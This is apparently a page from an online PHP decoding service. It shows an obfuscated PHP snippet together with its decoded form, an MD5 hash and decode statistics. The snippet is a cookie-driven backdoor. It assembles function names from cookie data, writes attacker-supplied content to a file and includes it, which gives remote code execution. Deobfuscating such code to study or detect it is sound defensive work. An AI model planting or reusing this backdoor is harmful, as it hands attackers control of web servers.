Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$c=$_COOKIE;$k=0;$n=6;$p=array();$p[$k]='';while($n){$p[$k].=$c[24][$n];if(!$c[24][$n+1]){..
Decoded Output download
<? $c=$_COOKIE;$k=0;$n=6;$p=array();$p[$k]='';while($n){$p[$k].=$c[24][$n];if(!$c[24][$n+1]){if(!$c[24][$n+2])break;$k++;$p[$k]='';$n++;}$n=$n+6+1;}$k=$p[18]().$p[2];if(!$p[24]($k)){$n=$p[1]($k,$p[19]);$p[11]($n,$p[27].$p[17]($p[0]($c[3])));}include($k); ?>
Did this file decode correctly?
Original Code
$c=$_COOKIE;$k=0;$n=6;$p=array();$p[$k]='';while($n){$p[$k].=$c[24][$n];if(!$c[24][$n+1]){if(!$c[24][$n+2])break;$k++;$p[$k]='';$n++;}$n=$n+6+1;}$k=$p[18]().$p[2];if(!$p[24]($k)){$n=$p[1]($k,$p[19]);$p[11]($n,$p[27].$p[17]($p[0]($c[3])));}include($k);
Function Calls
None |
Stats
MD5 | b7f2bda5e73c8ca245f38092ab87843a |
Eval Count | 0 |
Decode Time | 59 ms |